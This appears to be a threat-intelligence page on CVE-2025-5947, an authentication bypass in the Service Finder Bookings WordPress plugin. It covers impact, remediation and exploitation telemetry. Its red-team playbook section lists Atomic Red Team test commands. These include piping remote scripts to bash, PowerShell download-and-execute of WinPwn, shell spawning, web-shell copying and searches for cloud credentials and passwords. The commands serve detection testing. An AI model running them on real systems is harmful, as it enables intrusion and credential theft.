CVE-2025-5947
Overview
This vulnerability is an authentication bypass leading to privilege escalation within the Service Finder Bookings WordPress plugin. The root cause is improper validation of user cookie values in the service_finder_switch_back() function. This flaw exists in the session management component responsible for user login state transitions.
Vulnerability Description
The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.
Impact
An unauthenticated attacker can leverage this vulnerability to gain unauthorized access to any user account, including administrative accounts, without valid credentials. This allows full control over the affected WordPress site, enabling data theft, content manipulation, or further lateral attacks. The attack requires only network access to the WordPress site and no user interaction, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N, with high confidentiality, integrity, and availability impacts.
Solution
Users of the Service Finder Bookings plugin should upgrade to a patched version later than 6.0 as recommended by the vendor. Detailed remediation steps and patch availability are documented in the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cve. No official workaround is provided; immediate update to the fixed plugin version is required to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Service Finder Bookings plugin for WordPress arises from an inadequate validation process of user cookie values during the authentication phase. Specifically, the flaw is located within the service_finder_switch_back() function, which fails to ensure that the cookie value is legitimate before allowing a user to log in. This oversight permits unauthenticated attackers to bypass normal authentication mechanisms and gain access to user accounts, including those with administrative privileges. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk that could lead to unauthorized access and potential system compromise.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request that manipulates the cookie value, effectively tricking the system into believing the attacker is a legitimate user. This could be executed through common web exploitation techniques, such as session hijacking or cross-site scripting (XSS). Once the attacker successfully logs in as a user, they could escalate their privileges to that of an administrator, granting them unfettered access to the WordPress site. This access could be leveraged to modify site content, install malicious plugins, or exfiltrate sensitive user data, thereby amplifying the impact of the initial breach.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on the Service Finder Bookings plugin for their operations. A successful exploitation could lead to severe business risks, including data breaches, loss of customer trust, and potential regulatory penalties. For instance, if an attacker were to gain administrative access, they could manipulate booking data, disrupt service availability, or even deploy ransomware. The financial repercussions could be substantial, not only from immediate remediation costs but also from long-term reputational damage and loss of customer loyalty.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to monitor user authentication logs for any unusual activity that may indicate exploitation attempts, such as multiple failed login attempts or logins from unexpected IP addresses. Additionally, organizations should ensure that they are using the latest version of the Service Finder Bookings plugin, as updates often include critical security patches. Furthermore, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the application layer. Lastly, conducting regular security audits and penetration testing can proactively identify and remediate vulnerabilities before they can be exploited by attackers.
In conclusion, the privilege escalation vulnerability within the Service Finder Bookings plugin poses a serious threat to WordPress installations. Its ability to allow unauthenticated access to user accounts, including those with administrative privileges, can lead to significant operational and reputational damage. Organizations must prioritize the detection and mitigation of such vulnerabilities to safeguard their digital assets and maintain the integrity of their services. By adopting a comprehensive security strategy that includes timely updates, vigilant monitoring, and proactive testing, businesses can better protect themselves against the evolving landscape of cyber threats.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2025-5947, driven by the emergence of publicly available proof-of-concept exploit code on GitHub. This development has broadened the exploit landscape, lowering the technical barrier for threat actors to conduct privilege escalation attacks via the vulnerable Service Finder Bookings plugin. Our telemetry indicates a significant uptick in detection events consistent with attempts to leverage this vulnerability, accompanied by a rising Exploit Prediction Scoring System (EPSS) score that now places this CVE in the upper percentile of likely exploitation. The availability of exploit code in the public domain substantially increases the risk of widespread abuse, particularly by less sophisticated adversaries who can now weaponize the vulnerability without extensive custom development. Consequently, the threat level associated with CVE-2025-5947 has intensified, underscoring an urgent need for heightened vigilance among defenders monitoring WordPress environments using this plugin.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in detection activity related to CVE-2025-5947, indicating increased adversary interest or scanning efforts targeting the Service Finder Bookings plugin. Despite this surge in telemetry, the Exploit Prediction Scoring System (EPSS) score has sharply declined, reflecting a reduced likelihood of widespread exploitation in the immediate term. This divergence suggests that while reconnaissance or probing attempts are rising, successful exploitation or weaponization may be encountering operational challenges or diminished attacker prioritization. The availability of public proof-of-concept exploit code remains a critical factor sustaining baseline risk, but the current telemetry implies a potential cooling in active exploitation campaigns. For defenders, this nuanced shift underscores the importance of maintaining vigilant monitoring to detect any transition from increased scanning to active compromise attempts. Overall, the threat level remains elevated due to the vulnerability’s critical nature and exploit accessibility, but the recent telemetry trends moderate the urgency of imminent large-scale exploitation.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
xxconi/CVE-2025-5947
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
|
xxconi | 0 | 0 | 2026-05-30 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-5947 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cve |
| themeforest.net |
GitHub CVE
|
https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793 |
| vicarius.io |
NVD API
|
https://www.vicarius.io/vsociety/posts/cve-2025-5947-detect-wordpress-vulnerability |
| vicarius.io |
NVD API
|
https://www.vicarius.io/vsociety/posts/cve-2025-5947-mitigate-wordpress-vulnerability |